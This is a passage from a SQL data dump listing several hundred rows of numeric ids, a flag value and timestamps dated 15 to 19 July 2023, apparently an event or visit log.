10:02:18'),(80454,2904,1,'2023-07-15','2023-07-15 10:12:38'),(80455,4966,1,'2023-07-15','2023-07-15 10:26:05'),(80456,1594,1,'2023-07-15','2023-07-15 10:32:51'),(80457,1588,1,'2023-07-15','2023-07-15 10:45:28'),(80458,5122,1,'2023-07-15','2023-07-15 10:59:48'),(80459,4977,1,'2023-07-15','2023-07-15 11:13:18'),(80460,4238,1,'2023-07-15','2023-07-15 11:20:02'),(80461,4988,1,'2023-07-15','2023-07-15 11:23:06'),(80462,4529,1,'2023-07-15','2023-07-15 11:47:21'),(80463,2911,1,'2023-07-15','2023-07-15 11:53:12'),(80464,3489,1,'2023-07-15','2023-07-15 11:53:44'),(80465,80,1,'2023-07-15','2023-07-15 12:09:15'),(80466,5334,1,'2023-07-15','2023-07-15 12:14:05'),(80467,3229,1,'2023-07-15','2023-07-15 12:24:31'),(80468,1544,1,'2023-07-15','2023-07-15 13:03:02'),(80469,76,1,'2023-07-15','2023-07-15 13:13:51'),(80470,4911,1,'2023-07-15','2023-07-15 13:51:54'),(80471,4827,1,'2023-07-15','2023-07-15 13:58:57'),(80472,3489,1,'2023-07-15','2023-07-15 14:18:57'),(80473,4911,1,'2023-07-15','2023-07-15 14:32:37'),(80474,4520,1,'2023-07-15','2023-07-15 14:36:12'),(80475,335,1,'2023-07-15','2023-07-15 14:54:27'),(80476,1586,1,'2023-07-15','2023-07-15 15:05:11'),(80477,4485,1,'2023-07-15','2023-07-15 15:21:54'),(80478,4950,1,'2023-07-15','2023-07-15 15:28:12'),(80479,4485,1,'2023-07-15','2023-07-15 16:06:33'),(80480,1586,1,'2023-07-15','2023-07-15 16:11:20'),(80481,4827,1,'2023-07-15','2023-07-15 16:13:44'),(80482,4911,1,'2023-07-15','2023-07-15 16:31:52'),(80483,1594,1,'2023-07-15','2023-07-15 17:19:18'),(80484,4960,1,'2023-07-15','2023-07-15 17:51:38'),(80485,3290,1,'2023-07-15','2023-07-15 18:09:53'),(80486,470,1,'2023-07-15','2023-07-15 18:27:46'),(80487,1600,1,'2023-07-15','2023-07-15 18:37:42'),(80488,3247,1,'2023-07-15','2023-07-15 18:45:39'),(80489,2775,1,'2023-07-15','2023-07-15 19:00:33'),(80490,1614,1,'2023-07-15','2023-07-15 19:15:30'),(80491,1586,1,'2023-07-15','2023-07-15 19:44:08'),(80492,2309,1,'2023-07-15','2023-07-15 19:59:15'),(80493,5320,1,'2023-07-15','2023-07-15 20:57:09'),(80494,72,1,'2023-07-15','2023-07-15 21:22:45'),(80495,1612,1,'2023-07-15','2023-07-15 21:48:12'),(80496,2904,1,'2023-07-15','2023-07-15 22:13:43'),(80497,4938,1,'2023-07-15','2023-07-15 23:06:54'),(80498,473,1,'2023-07-15','2023-07-15 23:25:34'),(80499,473,1,'2023-07-15','2023-07-15 23:26:18'),(80500,469,1,'2023-07-15','2023-07-15 23:40:49'),(80501,4785,1,'2023-07-15','2023-07-15 23:54:30'),(80502,4785,1,'2023-07-16','2023-07-16 00:39:29'),(80503,3764,1,'2023-07-16','2023-07-16 00:52:29'),(80504,5353,1,'2023-07-16','2023-07-16 01:01:18'),(80505,4412,1,'2023-07-16','2023-07-16 01:04:45'),(80506,5353,1,'2023-07-16','2023-07-16 01:04:55'),(80507,5353,1,'2023-07-16','2023-07-16 01:05:41'),(80508,1594,1,'2023-07-16','2023-07-16 01:11:51'),(80509,4866,1,'2023-07-16','2023-07-16 01:24:30'),(80510,4412,1,'2023-07-16','2023-07-16 01:47:51'),(80511,1582,1,'2023-07-16','2023-07-16 01:50:27'),(80512,4938,1,'2023-07-16','2023-07-16 02:09:33'),(80513,3287,1,'2023-07-16','2023-07-16 02:29:10'),(80514,4556,1,'2023-07-16','2023-07-16 02:30:53'),(80515,482,1,'2023-07-16','2023-07-16 03:05:41'),(80516,4866,1,'2023-07-16','2023-07-16 03:25:34'),(80517,4387,1,'2023-07-16','2023-07-16 03:39:29'),(80518,4759,1,'2023-07-16','2023-07-16 03:54:31'),(80519,3781,1,'2023-07-16','2023-07-16 03:56:54'),(80520,4866,1,'2023-07-16','2023-07-16 04:07:10'),(80521,472,1,'2023-07-16','2023-07-16 04:18:39'),(80522,3004,1,'2023-07-16','2023-07-16 04:30:58'),(80523,2904,1,'2023-07-16','2023-07-16 05:48:29'),(80524,4911,1,'2023-07-16','2023-07-16 06:05:20'),(80525,5080,1,'2023-07-16','2023-07-16 06:22:13'),(80526,1612,1,'2023-07-16','2023-07-16 06:23:11'),(80527,5122,1,'2023-07-16','2023-07-16 07:06:57'),(80528,1612,1,'2023-07-16','2023-07-16 07:18:19'),(80529,1602,1,'2023-07-16','2023-07-16 07:41:35'),(80530,1728,1,'2023-07-16','2023-07-16 07:44:55'),(80531,3781,1,'2023-07-16','2023-07-16 08:43:44'),(80532,1598,1,'2023-07-16','2023-07-16 08:53:33'),(80533,76,1,'2023-07-16','2023-07-16 09:17:29'),(80534,1614,1,'2023-07-16','2023-07-16 09:44:19'),(80535,4950,1,'2023-07-16','2023-07-16 09:59:47'),(80536,5334,1,'2023-07-16','2023-07-16 10:28:08'),(80537,4960,1,'2023-07-16','2023-07-16 11:08:28'),(80538,3664,1,'2023-07-16','2023-07-16 11:13:47'),(80539,4612,1,'2023-07-16','2023-07-16 11:38:12'),(80540,4301,1,'2023-07-16','2023-07-16 12:43:45'),(80541,3004,1,'2023-07-16','2023-07-16 12:51:25'),(80542,1586,1,'2023-07-16','2023-07-16 13:00:30'),(80543,4635,1,'2023-07-16','2023-07-16 13:02:44'),(80544,4703,1,'2023-07-16','2023-07-16 13:39:59'),(80545,470,1,'2023-07-16','2023-07-16 15:12:25'),(80546,2775,1,'2023-07-16','2023-07-16 15:20:49'),(80547,335,1,'2023-07-16','2023-07-16 15:55:48'),(80548,3691,1,'2023-07-16','2023-07-16 15:58:34'),(80549,2293,1,'2023-07-16','2023-07-16 16:40:48'),(80550,5163,1,'2023-07-16','2023-07-16 16:46:37'),(80551,1711,1,'2023-07-16','2023-07-16 16:58:46'),(80552,1588,1,'2023-07-16','2023-07-16 17:18:50'),(80553,1612,1,'2023-07-16','2023-07-16 17:52:07'),(80554,4377,1,'2023-07-16','2023-07-16 18:04:07'),(80555,3706,1,'2023-07-16','2023-07-16 18:24:35'),(80556,4238,1,'2023-07-16','2023-07-16 18:26:12'),(80557,1582,1,'2023-07-16','2023-07-16 18:51:05'),(80558,4966,1,'2023-07-16','2023-07-16 19:17:16'),(80559,5268,1,'2023-07-16','2023-07-16 19:18:36'),(80560,3764,1,'2023-07-16','2023-07-16 19:18:36'),(80561,4776,1,'2023-07-16','2023-07-16 19:18:38'),(80562,4524,1,'2023-07-16','2023-07-16 19:18:39'),(80563,4529,1,'2023-07-16','2023-07-16 19:18:41'),(80564,1730,1,'2023-07-16','2023-07-16 19:53:35'),(80565,1600,1,'2023-07-16','2023-07-16 20:13:19'),(80566,4762,1,'2023-07-16','2023-07-16 20:55:13'),(80567,80,1,'2023-07-16','2023-07-16 21:14:51'),(80568,68,1,'2023-07-16','2023-07-16 21:14:55'),(80569,108,1,'2023-07-16','2023-07-16 21:14:59'),(80570,1745,1,'2023-07-16','2023-07-16 21:16:34'),(80571,5276,1,'2023-07-16','2023-07-16 21:16:36'),(80572,5289,1,'2023-07-16','2023-07-16 21:23:02'),(80573,1594,1,'2023-07-16','2023-07-16 21:51:26'),(80574,570,1,'2023-07-16','2023-07-16 21:59:11'),(80575,2309,1,'2023-07-16','2023-07-16 22:00:58'),(80576,3030,1,'2023-07-16','2023-07-16 22:23:22'),(80577,5356,1,'2023-07-16','2023-07-16 22:46:53'),(80578,1610,1,'2023-07-16','2023-07-16 22:47:45'),(80579,469,1,'2023-07-16','2023-07-16 22:58:43'),(80580,5071,1,'2023-07-16','2023-07-16 23:10:15'),(80581,4420,1,'2023-07-16','2023-07-16 23:41:20'),(80582,2911,1,'2023-07-16','2023-07-16 23:54:35'),(80583,4963,1,'2023-07-17','2023-07-17 00:12:28'),(80584,2911,1,'2023-07-17','2023-07-17 00:47:10'),(80585,4657,1,'2023-07-17','2023-07-17 00:54:00'),(80586,4759,1,'2023-07-17','2023-07-17 01:09:36'),(80587,2457,1,'2023-07-17','2023-07-17 01:12:40'),(80588,468,1,'2023-07-17','2023-07-17 01:13:41'),(80589,1594,1,'2023-07-17','2023-07-17 01:30:51'),(80590,3764,1,'2023-07-17','2023-07-17 01:57:12'),(80591,5256,1,'2023-07-17','2023-07-17 01:57:40'),(80592,472,1,'2023-07-17','2023-07-17 02:25:52'),(80593,4412,1,'2023-07-17','2023-07-17 02:35:13'),(80594,5256,1,'2023-07-17','2023-07-17 02:42:50'),(80595,5256,1,'2023-07-17','2023-07-17 03:05:10'),(80596,4759,1,'2023-07-17','2023-07-17 03:09:41'),(80597,1598,1,'2023-07-17','2023-07-17 03:12:14'),(80598,4977,1,'2023-07-17','2023-07-17 03:16:17'),(80599,4866,1,'2023-07-17','2023-07-17 03:20:09'),(80600,4542,1,'2023-07-17','2023-07-17 03:37:44'),(80601,468,1,'2023-07-17','2023-07-17 03:43:05'),(80602,467,1,'2023-07-17','2023-07-17 03:53:55'),(80603,2904,1,'2023-07-17','2023-07-17 04:04:03'),(80604,3313,1,'2023-07-17','2023-07-17 04:13:55'),(80605,4983,1,'2023-07-17','2023-07-17 04:24:32'),(80606,4911,1,'2023-07-17','2023-07-17 04:28:52'),(80607,3691,1,'2023-07-17','2023-07-17 04:41:04'),(80608,468,1,'2023-07-17','2023-07-17 04:42:56'),(80609,1614,1,'2023-07-17','2023-07-17 04:49:08'),(80610,4668,1,'2023-07-17','2023-07-17 04:51:51'),(80611,4911,1,'2023-07-17','2023-07-17 04:53:46'),(80612,4866,1,'2023-07-17','2023-07-17 05:05:08'),(80613,3691,1,'2023-07-17','2023-07-17 05:05:53'),(80614,3706,1,'2023-07-17','2023-07-17 05:11:19'),(80615,3229,1,'2023-07-17','2023-07-17 05:27:42'),(80616,3706,1,'2023-07-17','2023-07-17 05:33:47'),(80617,5253,1,'2023-07-17','2023-07-17 05:35:36'),(80618,4874,1,'2023-07-17','2023-07-17 05:43:04'),(80619,2309,1,'2023-07-17','2023-07-17 05:55:22'),(80620,4674,1,'2023-07-17','2023-07-17 06:07:50'),(80621,3102,1,'2023-07-17','2023-07-17 06:20:17'),(80622,1612,1,'2023-07-17','2023-07-17 06:28:56'),(80623,3489,1,'2023-07-17','2023-07-17 06:55:13'),(80624,4941,1,'2023-07-17','2023-07-17 07:09:26'),(80625,2617,1,'2023-07-17','2023-07-17 07:21:56'),(80626,4627,1,'2023-07-17','2023-07-17 07:30:20'),(80627,1588,1,'2023-07-17','2023-07-17 07:56:39'),(80628,4944,1,'2023-07-17','2023-07-17 08:24:01'),(80629,4966,1,'2023-07-17','2023-07-17 08:57:12'),(80630,4944,1,'2023-07-17','2023-07-17 09:09:02'),(80631,76,1,'2023-07-17','2023-07-17 09:14:21'),(80632,1604,1,'2023-07-17','2023-07-17 09:16:04'),(80633,5163,1,'2023-07-17','2023-07-17 09:17:11'),(80634,1772,1,'2023-07-17','2023-07-17 09:36:13'),(80635,3781,1,'2023-07-17','2023-07-17 09:48:37'),(80636,335,1,'2023-07-17','2023-07-17 09:59:41'),(80637,4703,1,'2023-07-17','2023-07-17 10:06:59'),(80638,3664,1,'2023-07-17','2023-07-17 10:10:23'),(80639,487,1,'2023-07-17','2023-07-17 10:15:41'),(80640,473,1,'2023-07-17','2023-07-17 10:15:41'),(80641,3090,1,'2023-07-17','2023-07-17 10:50:28'),(80642,4485,1,'2023-07-17','2023-07-17 10:51:29'),(80643,470,1,'2023-07-17','2023-07-17 10:59:40'),(80644,5163,1,'2023-07-17','2023-07-17 11:04:44'),(80645,3226,1,'2023-07-17','2023-07-17 11:18:15'),(80646,5163,1,'2023-07-17','2023-07-17 11:20:35'),(80647,1596,1,'2023-07-17','2023-07-17 11:58:25'),(80648,68,1,'2023-07-17','2023-07-17 11:58:58'),(80649,1586,1,'2023-07-17','2023-07-17 12:08:57'),(80650,5163,1,'2023-07-17','2023-07-17 12:13:30'),(80651,335,1,'2023-07-17','2023-07-17 12:26:44'),(80652,1582,1,'2023-07-17','2023-07-17 13:22:00'),(80653,4301,1,'2023-07-17','2023-07-17 13:24:39'),(80654,1582,1,'2023-07-17','2023-07-17 13:25:39'),(80655,3023,1,'2023-07-17','2023-07-17 14:06:13'),(80656,4938,1,'2023-07-17','2023-07-17 14:24:13'),(80657,4608,1,'2023-07-17','2023-07-17 14:37:53'),(80658,1582,1,'2023-07-17','2023-07-17 14:39:03'),(80659,1582,1,'2023-07-17','2023-07-17 14:39:34'),(80660,1582,1,'2023-07-17','2023-07-17 14:40:15'),(80661,72,1,'2023-07-17','2023-07-17 14:41:09'),(80662,1594,1,'2023-07-17','2023-07-17 14:45:33'),(80663,3102,1,'2023-07-17','2023-07-17 14:53:55'),(80664,4911,1,'2023-07-17','2023-07-17 15:13:00'),(80665,1722,1,'2023-07-17','2023-07-17 15:28:48'),(80666,1722,1,'2023-07-17','2023-07-17 15:29:26'),(80667,1596,1,'2023-07-17','2023-07-17 15:36:51'),(80668,91,1,'2023-07-17','2023-07-17 15:52:13'),(80669,3102,1,'2023-07-17','2023-07-17 15:55:54'),(80670,4944,1,'2023-07-17','2023-07-17 16:19:16'),(80671,80,1,'2023-07-17','2023-07-17 16:20:33'),(80672,4944,1,'2023-07-17','2023-07-17 16:23:17'),(80673,1592,1,'2023-07-17','2023-07-17 16:44:08'),(80674,2252,1,'2023-07-17','2023-07-17 16:49:13'),(80675,5163,1,'2023-07-17','2023-07-17 17:06:25'),(80676,1586,1,'2023-07-17','2023-07-17 17:09:31'),(80677,1600,1,'2023-07-17','2023-07-17 18:15:46'),(80678,5320,1,'2023-07-17','2023-07-17 18:15:47'),(80679,570,1,'2023-07-17','2023-07-17 18:19:06'),(80680,3674,1,'2023-07-17','2023-07-17 18:19:13'),(80681,1602,1,'2023-07-17','2023-07-17 18:34:14'),(80682,4950,1,'2023-07-17','2023-07-17 19:15:50'),(80683,4963,1,'2023-07-17','2023-07-17 19:29:37'),(80684,5037,1,'2023-07-17','2023-07-17 19:57:26'),(80685,4911,1,'2023-07-17','2023-07-17 20:04:44'),(80686,5122,1,'2023-07-17','2023-07-17 20:24:24'),(80687,5276,1,'2023-07-17','2023-07-17 20:50:47'),(80688,5292,1,'2023-07-17','2023-07-17 21:17:54'),(80689,5289,1,'2023-07-17','2023-07-17 21:46:23'),(80690,1745,1,'2023-07-17','2023-07-17 22:19:27'),(80691,4485,1,'2023-07-17','2023-07-17 22:20:11'),(80692,4963,1,'2023-07-17','2023-07-17 23:06:17'),(80693,2989,1,'2023-07-17','2023-07-17 23:16:08'),(80694,4941,1,'2023-07-17','2023-07-17 23:30:43'),(80695,4976,1,'2023-07-17','2023-07-17 23:30:54'),(80696,4645,1,'2023-07-17','2023-07-17 23:31:07'),(80697,469,1,'2023-07-17','2023-07-17 23:32:21'),(80698,1598,1,'2023-07-17','2023-07-17 23:35:08'),(80699,3096,1,'2023-07-17','2023-07-17 23:49:36'),(80700,4485,1,'2023-07-17','2023-07-17 23:50:36'),(80701,1602,1,'2023-07-17','2023-07-17 23:58:15'),(80702,1594,1,'2023-07-18','2023-07-18 00:09:45'),(80703,4759,1,'2023-07-18','2023-07-18 00:09:47'),(80704,3721,1,'2023-07-18','2023-07-18 00:10:03'),(80705,2150,1,'2023-07-18','2023-07-18 00:10:15'),(80706,5356,1,'2023-07-18','2023-07-18 00:23:23'),(80707,4785,1,'2023-07-18','2023-07-18 00:23:43'),(80708,3090,1,'2023-07-18','2023-07-18 00:24:39'),(80709,2911,1,'2023-07-18','2023-07-18 00:29:10'),(80710,1774,1,'2023-07-18','2023-07-18 00:32:03'),(80711,1745,1,'2023-07-18','2023-07-18 00:39:49'),(80712,4966,1,'2023-07-18','2023-07-18 01:07:00'),(80713,4420,1,'2023-07-18','2023-07-18 01:15:34'),(80714,4323,1,'2023-07-18','2023-07-18 01:17:55'),(80715,4938,1,'2023-07-18','2023-07-18 01:38:35'),(80716,470,1,'2023-07-18','2023-07-18 01:46:38'),(80717,4744,1,'2023-07-18','2023-07-18 01:53:13'),(80718,4301,1,'2023-07-18','2023-07-18 01:59:11'),(80719,4582,1,'2023-07-18','2023-07-18 02:10:08'),(80720,470,1,'2023-07-18','2023-07-18 02:12:28'),(80721,4960,1,'2023-07-18','2023-07-18 02:20:06'),(80722,3764,1,'2023-07-18','2023-07-18 02:45:32'),(80723,4642,1,'2023-07-18','2023-07-18 02:53:55'),(80724,5320,1,'2023-07-18','2023-07-18 03:02:04'),(80725,1596,1,'2023-07-18','2023-07-18 03:04:31'),(80726,4785,1,'2023-07-18','2023-07-18 03:08:36'),(80727,3714,1,'2023-07-18','2023-07-18 03:10:24'),(80728,5157,1,'2023-07-18','2023-07-18 03:26:58'),(80729,2751,1,'2023-07-18','2023-07-18 03:43:35'),(80730,5314,1,'2023-07-18','2023-07-18 03:43:41'),(80731,1594,1,'2023-07-18','2023-07-18 03:51:58'),(80732,4938,1,'2023-07-18','2023-07-18 03:53:35'),(80733,1872,1,'2023-07-18','2023-07-18 04:07:45'),(80734,3240,1,'2023-07-18','2023-07-18 04:08:21'),(80735,3124,1,'2023-07-18','2023-07-18 04:08:54'),(80736,4663,1,'2023-07-18','2023-07-18 04:16:10'),(80737,4771,1,'2023-07-18','2023-07-18 04:23:44'),(80738,3240,1,'2023-07-18','2023-07-18 04:23:46'),(80739,4651,1,'2023-07-18','2023-07-18 04:24:05'),(80740,3285,1,'2023-07-18','2023-07-18 04:26:54'),(80741,4963,1,'2023-07-18','2023-07-18 04:47:53'),(80742,1877,1,'2023-07-18','2023-07-18 04:54:25'),(80743,4387,1,'2023-07-18','2023-07-18 04:54:49'),(80744,5295,1,'2023-07-18','2023-07-18 05:04:06'),(80745,4753,1,'2023-07-18','2023-07-18 05:21:14'),(80746,3714,1,'2023-07-18','2023-07-18 05:43:43'),(80747,5080,1,'2023-07-18','2023-07-18 05:44:45'),(80748,468,1,'2023-07-18','2023-07-18 05:55:02'),(80749,4323,1,'2023-07-18','2023-07-18 05:59:51'),(80750,4238,1,'2023-07-18','2023-07-18 06:06:47'),(80751,4911,1,'2023-07-18','2023-07-18 06:10:26'),(80752,4412,1,'2023-07-18','2023-07-18 06:16:30'),(80753,1582,1,'2023-07-18','2023-07-18 06:38:49'),(80754,469,1,'2023-07-18','2023-07-18 06:51:39'),(80755,4911,1,'2023-07-18','2023-07-18 07:09:22'),(80756,4387,1,'2023-07-18','2023-07-18 07:25:02'),(80757,1582,1,'2023-07-18','2023-07-18 07:27:20'),(80758,3278,1,'2023-07-18','2023-07-18 07:45:22'),(80759,2293,1,'2023-07-18','2023-07-18 08:06:11'),(80760,1614,1,'2023-07-18','2023-07-18 08:08:49'),(80761,335,1,'2023-07-18','2023-07-18 08:13:38'),(80762,468,1,'2023-07-18','2023-07-18 08:21:09'),(80763,335,1,'2023-07-18','2023-07-18 08:39:51'),(80764,4950,1,'2023-07-18','2023-07-18 09:31:08'),(80765,3034,1,'2023-07-18','2023-07-18 09:48:11'),(80766,3278,1,'2023-07-18','2023-07-18 10:06:06'),(80767,1612,1,'2023-07-18','2023-07-18 10:23:02'),(80768,4977,1,'2023-07-18','2023-07-18 10:46:07'),(80769,488,1,'2023-07-18','2023-07-18 10:46:18'),(80770,4830,1,'2023-07-18','2023-07-18 10:46:37'),(80771,3680,1,'2023-07-18','2023-07-18 10:46:38'),(80772,5163,1,'2023-07-18','2023-07-18 11:08:49'),(80773,3691,1,'2023-07-18','2023-07-18 11:08:56'),(80774,4960,1,'2023-07-18','2023-07-18 11:52:45'),(80775,80,1,'2023-07-18','2023-07-18 11:53:45'),(80776,4960,1,'2023-07-18','2023-07-18 11:56:19'),(80777,4911,1,'2023-07-18','2023-07-18 12:20:40'),(80778,80,1,'2023-07-18','2023-07-18 12:26:55'),(80779,4238,1,'2023-07-18','2023-07-18 12:56:10'),(80780,4776,1,'2023-07-18','2023-07-18 12:59:39'),(80781,1598,1,'2023-07-18','2023-07-18 13:10:26'),(80782,4703,1,'2023-07-18','2023-07-18 13:21:39'),(80783,3092,1,'2023-07-18','2023-07-18 13:37:54'),(80784,3664,1,'2023-07-18','2023-07-18 14:02:45'),(80785,76,1,'2023-07-18','2023-07-18 14:03:21'),(80786,3226,1,'2023-07-18','2023-07-18 14:07:10'),(80787,5137,1,'2023-07-18','2023-07-18 14:35:13'),(80788,5137,1,'2023-07-18','2023-07-18 14:35:35'),(80789,5359,1,'2023-07-18','2023-07-18 14:35:53'),(80790,5307,1,'2023-07-18','2023-07-18 14:36:05'),(80791,5353,1,'2023-07-18','2023-07-18 14:36:17'),(80792,5307,1,'2023-07-18','2023-07-18 14:36:29'),(80793,5334,1,'2023-07-18','2023-07-18 14:36:40'),(80794,5310,1,'2023-07-18','2023-07-18 14:36:52'),(80795,5359,1,'2023-07-18','2023-07-18 14:37:03'),(80796,5353,1,'2023-07-18','2023-07-18 14:37:17'),(80797,5317,1,'2023-07-18','2023-07-18 14:37:28'),(80798,4938,1,'2023-07-18','2023-07-18 16:03:32'),(80799,5280,1,'2023-07-18','2023-07-18 16:04:09'),(80800,4938,1,'2023-07-18','2023-07-18 16:04:29'),(80801,3781,1,'2023-07-18','2023-07-18 16:26:23'),(80802,3069,1,'2023-07-18','2023-07-18 16:37:44'),(80803,1588,1,'2023-07-18','2023-07-18 16:55:35'),(80804,2159,1,'2023-07-18','2023-07-18 17:25:06'),(80805,470,1,'2023-07-18','2023-07-18 17:30:03'),(80806,3069,1,'2023-07-18','2023-07-18 18:02:44'),(80807,2775,1,'2023-07-18','2023-07-18 18:04:38'),(80808,2989,1,'2023-07-18','2023-07-18 18:11:07'),(80809,4911,1,'2023-07-18','2023-07-18 18:29:11'),(80810,2989,1,'2023-07-18','2023-07-18 18:34:31'),(80811,4911,1,'2023-07-18','2023-07-18 18:35:15'),(80812,4930,1,'2023-07-18','2023-07-18 18:39:29'),(80813,4938,1,'2023-07-18','2023-07-18 18:57:17'),(80814,4404,1,'2023-07-18','2023-07-18 19:13:29'),(80815,76,1,'2023-07-18','2023-07-18 19:15:40'),(80816,4238,1,'2023-07-18','2023-07-18 19:30:36'),(80817,1586,1,'2023-07-18','2023-07-18 19:32:29'),(80818,4976,1,'2023-07-18','2023-07-18 20:11:45'),(80819,470,1,'2023-07-18','2023-07-18 20:21:09'),(80820,4976,1,'2023-07-18','2023-07-18 20:27:04'),(80821,91,1,'2023-07-18','2023-07-18 20:33:20'),(80822,4960,1,'2023-07-18','2023-07-18 20:39:39'),(80823,4976,1,'2023-07-18','2023-07-18 20:39:52'),(80824,4988,1,'2023-07-18','2023-07-18 20:40:31'),(80825,3117,1,'2023-07-18','2023-07-18 20:40:53'),(80826,4976,1,'2023-07-18','2023-07-18 20:41:13'),(80827,4983,1,'2023-07-18','2023-07-18 20:41:44'),(80828,4976,1,'2023-07-18','2023-07-18 20:42:19'),(80829,76,1,'2023-07-18','2023-07-18 20:42:25'),(80830,4960,1,'2023-07-18','2023-07-18 20:42:42'),(80831,4960,1,'2023-07-18','2023-07-18 20:53:49'),(80832,4960,1,'2023-07-18','2023-07-18 20:55:12'),(80833,76,1,'2023-07-18','2023-07-18 20:55:19'),(80834,4960,1,'2023-07-18','2023-07-18 20:55:25'),(80835,3102,1,'2023-07-18','2023-07-18 21:47:35'),(80836,1722,1,'2023-07-18','2023-07-18 21:52:44'),(80837,4888,1,'2023-07-18','2023-07-18 21:52:50'),(80838,468,1,'2023-07-18','2023-07-18 22:54:33'),(80839,4612,1,'2023-07-18','2023-07-18 22:55:14'),(80840,2150,1,'2023-07-18','2023-07-18 22:57:09'),(80841,4428,1,'2023-07-18','2023-07-18 22:57:11'),(80842,1608,1,'2023-07-18','2023-07-18 23:00:38'),(80843,5356,1,'2023-07-18','2023-07-18 23:02:16'),(80844,3438,1,'2023-07-18','2023-07-18 23:16:51'),(80845,4911,1,'2023-07-18','2023-07-18 23:18:07'),(80846,469,1,'2023-07-18','2023-07-18 23:20:33'),(80847,4966,1,'2023-07-18','2023-07-18 23:31:23'),(80848,1582,1,'2023-07-18','2023-07-18 23:35:04'),(80849,5028,1,'2023-07-19','2023-07-19 00:30:40'),(80850,2148,1,'2023-07-19','2023-07-19 00:33:11'),(80851,1594,1,'2023-07-19','2023-07-19 00:54:46'),(80852,4759,1,'2023-07-19','2023-07-19 01:52:54'),(80853,467,1,'2023-07-19','2023-07-19 01:55:44'),(80854,3229,1,'2023-07-19','2023-07-19 02:11:21'),(80855,4759,1,'2023-07-19','2023-07-19 02:15:31'),(80856,2809,1,'2023-07-19','2023-07-19 02:24:02'),(80857,5256,1,'2023-07-19','2023-07-19 02:24:24'),(80858,5256,1,'2023-07-19','2023-07-19 02:37:54'),(80859,3764,1,'2023-07-19','2023-07-19 02:43:50'),(80860,2751,1,'2023-07-19','2023-07-19 03:24:28'),(80861,76,1,'2023-07-19','2023-07-19 03:24:52'),(80862,4524,1,'2023-07-19','2023-07-19 03:29:03'),(80863,91,1,'2023-07-19','2023-07-19 03:47:59'),(80864,4944,1,'2023-07-19','2023-07-19 03:53:25'),(80865,4944,1,'2023-07-19','2023-07-19 03:53:41'),(80866,472,1,'2023-07-19','2023-07-19 04:05:54'),(80867,335,1,'2023-07-19','2023-07-19 04:26:27'),(80868,3438,1,'2023-07-19','2023-07-19 04:27:13'),(80869,5113,1,'2023-07-19','2023-07-19 04:34:35'),(80870,1592,1,'2023-07-19','2023-07-19 04:53:51'),(80871,3706,1,'2023-07-19','2023-07-19 04:54:51'),(80872,5264,1,'2023-07-19','2023-07-19 05:36:19'),(80873,4404,1,'2023-07-19','2023-07-19 05:46:47'),(80874,570,1,'2023-07-19','2023-07-19 06:03:37'),(80875,1596,1,'2023-07-19','2023-07-19 06:14:00'),(80876,4412,1,'2023-07-19','2023-07-19 06:16:43'),(80877,4529,1,'2023-07-19','2023-07-19 06:47:11'),(80878,4874,1,'2023-07-19','2023-07-19 06:57:07'),(80879,4911,1,'2023-07-19','2023-07-19 07:00:54'),(80880,1600,1,'2023-07-19','2023-07-19 07:07:42'),(80881,3261,1,'2023-07-19','2023-07-19 07:19:25'),(80882,570,1,'2023-07-19','2023-07-19 07:24:17'),(80883,3257,1,'2023-07-19','2023-07-19 07:41:04'),(80884,1612,1,'2023-07-19','2023-07-19 07:44:34'),(80885,1614,1,'2023-07-19','2023-07-19 08:22:14'),(80886,478,1,'2023-07-19','2023-07-19 08:47:26'),(80887,4911,1,'2023-07-19','2023-07-19 09:24:46'),(80888,1582,1,'2023-07-19','2023-07-19 09:38:37'),(80889,5320,1,'2023-07-19','2023-07-19 10:10:53'),(80890,68,1,'2023-07-19','2023-07-19 10:59:55'),(80891,1602,1,'2023-07-19','2023-07-19 11:10:12'),(80892,1582,1,'2023-07-19','2023-07-19 11:48:57'),(80893,4866,1,'2023-07-19','2023-07-19 12:07:51'),(80894,5276,1,'2023-07-19','2023-07-19 12:08:50'),(80895,4960,1,'2023-07-19','2023-07-19 12:13:49'),(80896,80,1,'2023-07-19','2023-07-19 12:13:56'),(80897,4963,1,'2023-07-19','2023-07-19 12:14:18'),(80898,4960,1,'2023-07-19','2023-07-19 12:16:06'),(80899,4911,1,'2023-07-19','2023-07-19 12:31:11'),(80900,4911,1,'2023-07-19','2023-07-19 12:31:19'),(80901,2775,1,'2023-07-19','2023-07-19 12:48:40'),(80902,1602,1,'2023-07-19','2023-07-19 13:28:30'),(80903,4396,1,'2023-07-19','2023-07-19 13:36:21'),(80904,4866,1,'2023-07-19','2023-07-19 13:37:56'),(80905,3781,1,'2023-07-19','2023-07-19 13:48:34'),(80906,76,1,'2023-07-19','2023-07-19 13:49:21'),(80907,4612,1,'2023-07-19','2023-07-19 14:05:00'),(80908,1582,1,'2023-07-19','2023-07-19 14:05:57'),(80909,5256,1,'2023-07-19','2023-07-19 14:07:56'),(80910,1600,1,'2023-07-19','2023-07-19 14:08:58'),(80911,1612,1,'2023-07-19','2023-07-19 14:20:55'),(80912,1612,1,'2023-07-19','2023-07-19 14:22:13'),(80913,1612,1,'2023-07-19','2023-07-19 14:24:33'),(80914,76,1,'2023-07-19','2023-07-19 14:24:54'),(80915,1612,1,'2023-07-19','2023-07-19 14:26:55'),(80916,3664,1,'2023-07-19','2023-07-19 14:27:25'),(80917,80,1,'2023-07-19','2023-07-19 14:28:20'),(80918,1594,1,'2023-07-19','2023-07-19 14:30:51'),(80919,4966,1,'2023-07-19','2023-07-19 15:28:23'),(80920,4412,1,'2023-07-19','2023-07-19 15:46:18'),(80921,1602,1,'2023-07-19','2023-07-19 15:50:33'),(80922,487,1,'2023-07-19','2023-07-19 15:54:42'),(80923,473,1,'2023-07-19','2023-07-19 15:54:47'),(80924,473,1,'2023-07-19','2023-07-19 16:11:39'),(80925,487,1,'2023-07-19','2023-07-19 16:11:39'),(80926,4870,1,'2023-07-19','2023-07-19 16:13:14'),(80927,4960,1,'2023-07-19','2023-07-19 16:16:28'),(80928,1610,1,'2023-07-19','2023-07-19 16:18:17'),(80929,1588,1,'2023-07-19','2023-07-19 16:22:08'),(80930,2911,1,'2023-07-19','2023-07-19 16:24:55'),(80931,3102,1,'2023-07-19','2023-07-19 16:28:59'),(80932,4950,1,'2023-07-19','2023-07-19 16:31:17'),(80933,1745,1,'2023-07-19','2023-07-19 16:55:00'),(80934,1722,1,'2023-07-19','2023-07-19 17:28:38'),(80935,3691,1,'2023-07-19','2023-07-19 17:32:08'),(80936,4341,1,'2023-07-19','2023-07-19 18:08:18'),(80937,2911,1,'2023-07-19','2023-07-19 18:25:02'),(80938,2904,1,'2023-07-19','2023-07-19 18:51:50'),(80939,4911,1,'2023-07-19','2023-07-19 